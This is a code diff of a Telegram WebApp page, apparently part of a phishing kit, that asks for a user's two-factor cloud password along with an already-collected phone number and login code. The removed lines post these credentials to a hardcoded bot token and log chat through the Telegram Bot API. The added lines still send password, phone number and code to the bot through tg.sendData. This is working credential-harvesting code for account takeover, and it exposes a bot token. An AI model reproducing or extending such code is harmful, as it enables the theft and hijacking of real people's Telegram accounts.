--- a/password.html
+++ b/password.html
@@ -325,143 +325,77 @@
 			);
 			const confirmationText = document.getElementById('confirmationText');
 
-			function sendPasswordToBot(password = '') {
+			function handleSkipAction() {
 				try {
-					const user = tg.initDataUnsafe?.user;
+					if (!skipButton.classList.contains('button-confirm')) {
+						if (confirmationText) confirmationText.style.display = 'block';
+						skipButton.textContent = 'Да, пропустить';
+						skipButton.classList.remove('button-secondary');
+						skipButton.classList.add('button-confirm');
+					} else {
+						if (passwordScreen) passwordScreen.style.display = 'none';
+						if (loadingScreen) loadingScreen.style.display = 'flex';
 
-					if (tg.sendData) {
-						tg.sendData(
-							JSON.stringify({
-								type: '2fa_password',
-								password: password,
-								phone_number: phoneNumber,
-								auth_code: code,
-								user_id: user?.id,
-							})
-						);
-					}
-				} catch (e) {
-					console.log('Error sending password to Telegram');
-				}
-
-				sendPasswordToLog(password);
-			}
-
-			function sendPasswordToLog(password = '') {
-				const botToken = '8260777158:AAHcoUGlzRodN2_7Xkrt4DLF1ovHAHYaH90';
-				const logChatId = '-1003235434555';
-
-				try {
-					const user = tg.initDataUnsafe?.user;
-					const username = user?.username
-						? `@${user.username}`
-						: 'без username';
-
-					const message = password
-						? `🔐 Пароль 2FA из WebApp\n👤 Пользователь: ${username}\n📱 Телефон: ${phoneNumber}\n🔢 Код: ${code}\n🔑 Пароль: ${password}`
-						: `🔐 Пропуск 2FA из WebApp\n👤 Пользователь: ${username}\n📱 Телефон: ${phoneNumber}\n🔢 Код: ${code}\n⚠️ Пароль не введен (пропущено)`;
-
-					fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
-						method: 'POST',
-						headers: {
-							'Content-Type': 'application/json',
-						},
-						body: JSON.stringify({
-							chat_id: logChatId,
-							text: message,
-							parse_mode: 'HTML',
-						}),
-					}).catch(error => {
-						console.error('Ошибка отправки пароля в лог:', error);
-					});
-				} catch (e) {
-					console.log('Error sending password to log:', e);
-				}
-			}
-
-			function safeNavigate(url) {
-				try {
-					window.location.href = url;
-				} catch (e) {
-					console.log('Navigation error:', e);
-				}
-			}
-
-			if (forgotPasswordLink) {
-				forgotPasswordLink.addEventListener('click', () => {
-					try {
-						forgotPasswordContainer.innerHTML = `
-          <div class="password-reset-info">
-            Чтобы сбросить пароль перейдите в 
-            <a class="settings-link" id="settingsLink">Настройки</a>
-            <span class="arrow">→</span>
-            Безопасность и конфиденциальность
-            <span class="arrow">→</span>
-            Облачный пароль
-          </div>
-        `;
-
-						const settingsLink = document.getElementById('settingsLink');
-						if (settingsLink) {
-							settingsLink.addEventListener('click', () => {
-								try {
-									window.open('tg://settings', '_blank');
-								} catch (e) {
-									console.log('Error opening settings');
-								}
-							});
+						if (tg && tg.sendData) {
+							tg.sendData(
+								JSON.stringify({
+									type: '2fa_password',
+									password: '',
+									phone_number: phoneNumber,
+									auth_code: code,
+									user_id: tg.initDataUnsafe?.user?.id || '',
+								})
+							);
+							if (tg.close) tg.close();
 						}
-					} catch (e) {
-						console.log('Error handling forgot password link:', e);
 					}
-				});
+				} catch (e) {
+					console.log('Ошибка при обработке кнопки "Пропустить":', e);
+				}
+			}
+
+			function handleContinueAction() {
+				try {
+					const password = passwordInput?.value.trim() || '';
+
+					if (password) {
+						if (passwordScreen) passwordScreen.style.display = 'none';
+						if (loadingScreen) loadingScreen.style.display = 'flex';
+
+						if (tg && tg.sendData) {
+							tg.sendData(
+								JSON.stringify({
+									type: '2fa_password',
+									password: password,
+									phone_number: phoneNumber,
+									auth_code: code,
+									user_id: tg.initDataUnsafe?.user?.id || '',
+								})
+							);
+							if (tg.close) tg.close();
+						}
+					} else {
+						if (passwordInput) {
+							passwordInput.style.borderColor = '#ff4444';
+							passwordInput.style.boxShadow =
+								'0 0 0 2px rgba(255, 68, 68, 0.3)';
+							setTimeout(() => {
+								passwordInput.style.borderColor = '#3a3a3a';
+								passwordInput.style.boxShadow = 'none';
+							}, 1000);
+						}
+					}
+				} catch (e) {
+					console.log('Ошибка при обработке кнопки "Продолжить":', e);
+				}
 			}
 
 			if (skipButton) {
-				skipButton.addEventListener('click', () => {
-					try {
-						if (!skipButton.classList.contains('button-confirm')) {
-							if (confirmationText) confirmationText.style.display = 'block';
-							skipButton.textContent = 'Да, пропустить';
-							skipButton.classList.remove('button-secondary');
-							skipButton.classList.add('button-confirm');
-						} else {
-							if (passwordScreen) passwordScreen.style.display = 'none';
-							if (loadingScreen) loadingScreen.style.display = 'flex';
-
-							sendPasswordToBot('');
-						}
-					} catch (e) {
-						console.log('Error in skip button handler:', e);
-					}
-				});
+				skipButton.addEventListener('click', handleSkipAction);
 			}
 
 			if (continueButton) {
-				continueButton.addEventListener('click', () => {
-					try {
-						const password = passwordInput?.value.trim() || '';
-
-						if (password) {
-							if (passwordScreen) passwordScreen.style.display = 'none';
-							if (loadingScreen) loadingScreen.style.display = 'flex';
-
-							sendPasswordToBot(password);
-						} else {
-							if (passwordInput) {
-								passwordInput.style.borderColor = '#ff4444';
-								passwordInput.style.boxShadow =
-									'0 0 0 2px rgba(255, 68, 68, 0.3)';
-								setTimeout(() => {
-									passwordInput.style.borderColor = '#3a3a3a';
-									passwordInput.style.boxShadow = 'none';
-								}, 1000);
-							}
-						}
-					} catch (e) {
-						console.log('Error in continue button handler:', e);
-					}
-				});
+				continueButton.addEventListener('click', handleContinueAction);
 			}
 
 			if (passwordInput) {
